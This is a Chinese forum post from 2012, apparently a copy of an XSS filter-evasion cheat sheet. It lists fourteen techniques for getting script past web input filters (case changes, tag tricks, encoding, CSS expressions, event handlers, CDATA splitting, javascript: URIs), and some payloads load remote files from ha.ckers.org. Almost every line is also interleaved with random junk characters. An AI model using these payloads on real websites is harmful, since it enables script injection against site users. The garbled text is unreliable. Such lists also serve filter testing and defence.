1. 改变字符大小写" s' A3 U* u) L0 f1 F, [. i
* O% {- g- o( H) E" \
/ l M2 S' J- B$ g( L& g" d
6 N6 R: h1 k. [( }, V& D$ V1 t& y
<sCript>alert(‘d’)</scRipT>8 b7 a$ I9 t7 Q3 H# T9 b
2 N6 B/ C# E2 x9 v2. 利用多加一些其它字符来规避Regular Expression的检查
, q; W8 }! y L: k1 h4 n) f
# M2 j* [& r3 r% d <<script>alert(‘c’)//<</script>0 p$ S, n5 d8 x
+ X3 W) `" r; W5 N$ [ <SCRIPT a=">" SRC="t.js"></SCRIPT>0 f& I# M& V0 Z3 C/ l
, ^* x3 h! }2 b6 [ <SCRIPT =">" SRC="t.js"></SCRIPT>' M& k4 M- H5 \* P( {( H3 |
' D9 l- T( ?& T3 Z! E <SCRIPT a=">" ” SRC="t.js"></SCRIPT>& o* W, r7 a* U- ?7 y
: F& q' J7 S! n' r; Y) D
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
2 E( R2 P# K7 x! a' Q$ E$ H/ B) L" l: N
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
$ W7 w4 f2 r S7 m, r! W% y" S5 k1 M' Y, u2 q6 r( g9 X
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
; Z0 d' V* Q" N% |+ v4 U
- T, Q/ {0 c8 E3 z# ~3. 以其它扩展名取代.js
" u% W5 J' O9 {9 @/ d, c9 e7 K2 k- b5 @/ K* A% g
<script src="bad.jpg"></script>9 s. p9 r* p( V7 ^: X5 \
2 n# S: Q8 U1 l* L+ ?6 b4. 将Javascript写在CSS档里0 Y1 _9 A4 z% E8 f* _% [
0 ]/ J7 K. ]: M4 k* Y <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
- Y' k( O1 Y+ e8 L- G% O, w/ n/ V1 `2 Z% J- e9 T' o
example:! n8 {1 B+ P4 B% \
! C- Q% s) Q1 C0 p7 X. x }
body {
$ X- ^( ~+ B, F, o% k; B- }
3 L& _* P/ `8 ]8 { background-image: url(‘javascript:alert("XSS");’)! o: w/ k; Q" P( L: V& n- `9 l' s
9 r% f5 Z/ Z6 R7 c+ k
}
# Q+ [0 }% H) j, F9 { V& n
$ k; V1 R# y- P" m5. 在script的tag里加入一些其它字符
" l( e+ j: l! O G# C0 r
! G: f/ Q- F% K1 `' t, y <SCRIPT/SRC="t.js"></SCRIPT>0 }& v3 b% _7 ^( N* ~) R& s
" L( e6 W: n5 I" T- E ~, z
<SCRIPT/anyword SRC="t.js"></SCRIPT>, N2 [: S2 m1 ?* ?$ G; b& B6 N4 R. S
0 A% ?/ ~1 O& D/ k8 G. e; m6. 使用tab或是new line来规避0 s" a0 c. v- P0 @
( Z. [* j% F( l; D c
<img src="jav ascr ipt:alert(‘XSS3′)">
: E, ~- ^7 _* C( {( a( m) {9 h- r2 n! |) t
<img src="jav ascr ipt:alert(‘XSS3′)">
* s: S" O1 a/ N. W+ O$ L) q3 ]* q, {( o4 t8 \
<IMG SRC="jav ascript:alert(‘XSS’);">; W5 T* \ `3 P' F6 R
! q% M7 x; c3 ~% k- r -> tag
2 o* u) r- {0 A4 [: i7 H/ B7 _5 r) F
-> new line" y- m7 l+ P8 J! a" @) w! W+ r
8 |( T4 n: v; r! c w; V7. 使用"\"来规避
- Y& C' R6 L) A/ ?) |( ^
4 p4 N) k" o/ F6 x) M <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
1 l& b) L) G! O/ z; S7 P5 w! ^. s7 w" U6 z) P. ]. f
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>7 t- P% K1 V8 s p& C) z
q: Q3 L! E G. C
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
. D3 W7 W( Z: c W' ~5 S, w& s7 s1 ~. S
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">6 V7 l( s$ q6 P; h F. V7 R
2 V c& F, E& k1 T" p9 Z <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
1 h" c$ s9 l+ R/ ]6 S& ? R$ a$ F" K$ b4 W1 }& l! _
8. 使用Hex encode来规避(也可能会把";"拿掉)
. N9 @, Y1 y4 V6 I2 r1 ^% P8 D
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">8 {& q" W8 G4 u& \6 Y! q
v b* E' @6 i5 y& L 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">: M+ o- O; b0 w
1 W: r, J m" | <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">5 a8 X, L& l' [8 m
* V2 H5 ~0 S! t
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
* z* O5 l% Q. z" b: ~
5 K- S7 F/ a8 c1 r! Z+ Z9. script in HTML tag
* h# V; {* Q1 T# a2 U
, E0 ^& A7 i$ Q- R# h/ G$ Y' g4 P <body onload=」alert(‘onload’)」> L4 {0 Y6 v& \( b1 _
+ c$ m3 {% u9 m0 X3 l
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload Y# ?5 e6 {# c9 r
- ?2 i/ j' H) m; t4 J10. 在swf里含有xss的code
# E M+ L8 B5 `- h' k; T+ Y5 x. j1 P
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>+ r1 o; ?) Y; {. W5 v0 U) u, U: O0 s
7 m f* n3 O* s6 Z9 M( e. |11. 利用CDATA将xss的code拆开,再组合起来。
/ q: x- d; s" Z# D1 {5 V; j- {) g2 x4 T8 e1 ?& |
<XML ID=I><X><C>
8 ?) O- f# Z6 H9 y) n4 ~
+ d; o. U5 b) A. h& ^6 D( O% M <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>1 l: v0 ]) i1 C# `! N
+ W# P' r* P8 B% R' { </C></X>
7 X+ b/ s. S+ r! K M7 K& k# n# w( I2 Y+ K/ k0 w# P! e
</xml>
+ a4 m$ { l. H% y9 Q" E6 r2 Z: n& B) s7 h
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- m- x# ~7 Q7 @1 }) s7 C& h
9 w% `) G7 [; m( r; r" l! L <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>; J4 B) |5 ], q' G
! H5 V9 v% S* ?4 Q+ h- }
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
6 z- m+ G$ ^- N- i7 \) N
. ?3 i2 k+ }3 v* ]! i6 ]# z12. 利用HTML+TIME。/ v# o8 R! H/ _( `0 p/ H8 C3 v2 d
0 m2 S% n& K6 ~* A/ U' v
<HTML><BODY># |$ b/ R6 C& J9 i# X! N6 ~* w/ ]9 z
2 b$ o$ J* S9 h. A9 _ <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
/ m: |+ f0 e0 L& e) L0 z+ f5 U. W4 B- k- x! P8 S) ^; x" J, Y
<?import namespace="t" implementation="#default#time2">
) @2 k) _( y3 n8 M
7 p$ Z+ Y4 `: P, f& j% v5 U k h0 v <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
5 R9 [6 Q3 m2 v4 K$ w
/ U6 `# }2 q. E3 y </BODY></HTML>) d; g1 t. J Q3 g, i* C& H
' R5 V2 e# P$ K: e' {4 x, s13. 透过META写入Cookie。- h, B. r1 k4 v9 B& l
7 e: S/ S2 m9 E" W/ [/ D+ @
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
. l5 N# J0 a! ]! l
. V! `% j5 q: x0 h14. javascript in src , href , url% v+ Q" V7 Z% J& j4 W
$ d3 U- G2 b: O6 ~) {& t
<IFRAME SRC=javascript:alert(’13′)></IFRAME>! T5 h! Z( s! z6 o4 X5 M
! o% t: F$ m7 G( [4 d
<img src="javascript:alert(‘XSS3′)">
2 p: o0 e' }" ]. ^* ?% }) H5 C, Y5 z8 }8 b
<IMG DYNSRC="javascript:alert(‘XSS20′)">
/ h1 [" w5 w) e& q" g2 X+ V2 Q; j! D1 _/ i2 m- M! j
<IMG LOWSRC="javascript:alert(‘XSS21′)">/ K* i) h2 l0 V# h
" L0 c9 Q$ F, L# c0 b$ k G <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">. z5 _$ I6 v" t
) n, N' {. _" v+ D% o9 g. {4 T <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>3 m* l. s6 ]' `! ~* {% o5 F& k
' y) l1 r6 n6 m$ Z
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">; O* v: A$ ]( B- h' o0 d% g
% t; z% N8 I+ e9 C. y
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">% A& ^# [% A: m& p9 z+ G+ f, P
) g( f7 t5 ]! s, L: d5 o" Q
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
; c" F$ D2 ?% g; u+ r
2 z8 a! I8 u$ _+ m9 ~. p </STYLE><A CLASS=XSS></A>
! U+ {9 ~/ K1 h7 C) E
; o m" P5 L! J/ v0 U( ` <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
# W5 l m5 w/ ~( x, ?! k+ W. Y# ? Q3 u9 P1 x: W
|
发表于 2012-12-31 09:59:28
收藏
支持
反对